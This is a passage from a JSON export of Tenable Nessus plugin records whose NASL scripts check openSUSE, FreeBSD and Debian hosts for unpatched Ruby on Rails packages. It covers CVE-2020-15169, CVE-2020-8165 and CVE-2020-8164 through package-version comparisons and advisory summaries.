script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rmt-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rmt-server-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rmt-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rmt-server-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:rmt-server-pubcloud\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"rmt-server-2.6.5-lp151.2.18.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"rmt-server-config-2.6.5-lp151.2.18.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"rmt-server-debuginfo-2.6.5-lp151.2.18.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"rmt-server-debugsource-2.6.5-lp151.2.18.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"rmt-server-pubcloud-2.6.5-lp151.2.18.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rmt-server / rmt-server-config / rmt-server-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:22:53", "description": "Ruby on Rails blog :\n\nRails 5.2.4.4 and 6.0.3.3 have been released! These releases contain an important security fix, so please upgrade when you can.\n\nBoth releases contain the following fix: [CVE-2020-15169] Potential XSS vulnerability in Action View", "cvss3": {}, "published": "2020-09-14T00:00:00", "type": "nessus", "title": "FreeBSD : Rails -- Potential XSS vulnerability (7b630362-f468-11ea-a96c-08002728f74c)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15169"], "modified": "2020-09-21T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:rubygem-actionview52", "p-cpe:/a:freebsd:freebsd:rubygem-actionview60", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_7B630362F46811EAA96C08002728F74C.NASL", "href": "https://www.tenable.com/plugins/nessus/140558", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(140558);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/21\");\n\n script_cve_id(\"CVE-2020-15169\");\n\n script_name(english:\"FreeBSD : Rails -- Potential XSS vulnerability (7b630362-f468-11ea-a96c-08002728f74c)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Ruby on Rails blog :\n\nRails 5.2.4.4 and 6.0.3.3 have been released! These releases contain\nan important security fix, so please upgrade when you can.\n\nBoth releases contain the following fix: [CVE-2020-15169] Potential\nXSS vulnerability in Action View\"\n );\n # https://weblog.rubyonrails.org/2020/9/10/Rails-5-2-4-4-and-6-0-3-3-have-been-released/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?378db660\"\n );\n # https://groups.google.com/forum/#!topic/rubyonrails-security/b-C9kSGXYrc\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8e6b7941\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/rails/rails/blob/5-2-stable/actionview/CHANGELOG.md\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/rails/rails/blob/6-0-stable/actionview/CHANGELOG.md\"\n );\n # https://vuxml.freebsd.org/freebsd/7b630362-f468-11ea-a96c-08002728f74c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?de9872c7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionview52\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionview60\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionview52<5.2.4.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionview60<6.0.3.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:21", "description": "A potential Cross-Site Scripting (XSS) vulnerability was found in rails, a ruby based MVC framework. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. When an HTML-unsafe string is passed as the default for a missing translation key named html or ending in _html, the default string is incorrectly marked as HTML-safe and not escaped.\n\nFor Debian 9 stretch, this problem has been fixed in version 2:4.2.7.1-1+deb9u4.\n\nWe recommend that you upgrade your rails packages.\n\nFor the detailed security status of rails please refer to its security tracker page at: https://security-tracker.debian.org/tracker/rails\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-12T00:00:00", "type": "nessus", "title": "Debian DLA-2403-1 : rails security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15169"], "modified": "2020-10-15T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:rails", "p-cpe:/a:debian:debian_linux:ruby-actionmailer", "p-cpe:/a:debian:debian_linux:ruby-actionpack", "p-cpe:/a:debian:debian_linux:ruby-actionview", "p-cpe:/a:debian:debian_linux:ruby-activejob", "p-cpe:/a:debian:debian_linux:ruby-activemodel", "p-cpe:/a:debian:debian_linux:ruby-activerecord", "p-cpe:/a:debian:debian_linux:ruby-activesupport", "p-cpe:/a:debian:debian_linux:ruby-rails", "p-cpe:/a:debian:debian_linux:ruby-railties", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2403.NASL", "href": "https://www.tenable.com/plugins/nessus/141379", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2403-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141379);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\"CVE-2020-15169\");\n\n script_name(english:\"Debian DLA-2403-1 : rails security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A potential Cross-Site Scripting (XSS) vulnerability was found in\nrails, a ruby based MVC framework. Views that allow the user to\ncontrol the default (not found) value of the `t` and `translate`\nhelpers could be susceptible to XSS attacks. When an HTML-unsafe\nstring is passed as the default for a missing translation key named\nhtml or ending in _html, the default string is incorrectly marked as\nHTML-safe and not escaped.\n\nFor Debian 9 stretch, this problem has been fixed in version\n2:4.2.7.1-1+deb9u4.\n\nWe recommend that you upgrade your rails packages.\n\nFor the detailed security status of rails please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/rails\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/10/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/rails\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/rails\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionmailer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activejob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activemodel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activerecord\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activesupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-railties\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"rails\", reference:\"2:4.2.7.1-1+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-actionmailer\", reference:\"2:4.2.7.1-1+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-actionpack\", reference:\"2:4.2.7.1-1+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-actionview\", reference:\"2:4.2.7.1-1+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-activejob\", reference:\"2:4.2.7.1-1+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-activemodel\", reference:\"2:4.2.7.1-1+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-activerecord\", reference:\"2:4.2.7.1-1+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-activesupport\", reference:\"2:4.2.7.1-1+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-rails\", reference:\"2:4.2.7.1-1+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-railties\", reference:\"2:4.2.7.1-1+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:11:00", "description": "This update for rubygem-activesupport-5_1 fixes the following issues :\n\n - CVE-2020-8165: Fixed deserialization of untrusted data in MemCacheStore potentially resulting in remote code execution (bsc#1172186)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2020-10-19T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-activesupport-5_1 (openSUSE-2020-1679)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8165"], "modified": "2020-10-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.5-rubygem-activesupport-5_1", "p-cpe:/a:novell:opensuse:ruby2.5-rubygem-activesupport-doc-5_1", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2020-1679.NASL", "href": "https://www.tenable.com/plugins/nessus/141523", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1679.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141523);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/21\");\n\n script_cve_id(\"CVE-2020-8165\");\n\n script_name(english:\"openSUSE Security Update : rubygem-activesupport-5_1 (openSUSE-2020-1679)\");\n script_summary(english:\"Check for the openSUSE-2020-1679 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for rubygem-activesupport-5_1 fixes the following issues :\n\n - CVE-2020-8165: Fixed deserialization of untrusted data\n in MemCacheStore potentially resulting in remote code\n execution (bsc#1172186)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172186\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected rubygem-activesupport-5_1 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.5-rubygem-activesupport-5_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.5-rubygem-activesupport-doc-5_1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ruby2.5-rubygem-activesupport-5_1-5.1.4-lp152.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ruby2.5-rubygem-activesupport-doc-5_1-5.1.4-lp152.4.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.5-rubygem-activesupport-5_1 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:59", "description": "This update for rubygem-actionpack-5_1 fixes the following issues :\n\n - CVE-2020-8164: Possible Strong Parameters Bypass in ActionPack. There is a strong parameters bypass vector in ActionPack. (bsc#1172177)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2020-10-05T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-actionpack-5_1 (openSUSE-2020-1533)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8164"], "modified": "2020-10-07T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.5-rubygem-actionpack-5_1", "p-cpe:/a:novell:opensuse:ruby2.5-rubygem-actionpack-doc-5_1", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-1533.NASL", "href": "https://www.tenable.com/plugins/nessus/141152", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1533.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141152);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/07\");\n\n script_cve_id(\"CVE-2020-8164\");\n\n script_name(english:\"openSUSE Security Update : rubygem-actionpack-5_1 (openSUSE-2020-1533)\");\n script_summary(english:\"Check for the openSUSE-2020-1533 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for rubygem-actionpack-5_1 fixes the following issues :\n\n - CVE-2020-8164: Possible Strong Parameters Bypass in\n ActionPack. There is a strong parameters bypass vector\n in ActionPack. (bsc#1172177)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172177\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected rubygem-actionpack-5_1 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.5-rubygem-actionpack-5_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.5-rubygem-actionpack-doc-5_1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ruby2.5-rubygem-actionpack-5_1-5.1.4-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ruby2.5-rubygem-actionpack-doc-5_1-5.1.4-lp151.4.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.5-rubygem-actionpack-5_1 / ruby2.5-rubygem-actionpack-doc-5_1\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:10:15", "description": "This update for rubygem-actionpack-5_1 fixes the following issues :\n\n - CVE-2020-8164: Possible Strong Parameters Bypass in ActionPack. There is a strong parameters bypass vector in ActionPack. (bsc#1172177)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2020-09-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-actionpack-5_1 (openSUSE-2020-1536)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8164"], "modified": "2020-10-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.5-rubygem-actionpack-5_1", "p-cpe:/a:novell:opensuse:ruby2.5-rubygem-actionpack-doc-5_1", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2020-1536.NASL", "href": "https://www.tenable.com/plugins/nessus/141074", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1536.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141074);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/05\");\n\n script_cve_id(\"CVE-2020-8164\");\n\n script_name(english:\"openSUSE Security Update : rubygem-actionpack-5_1 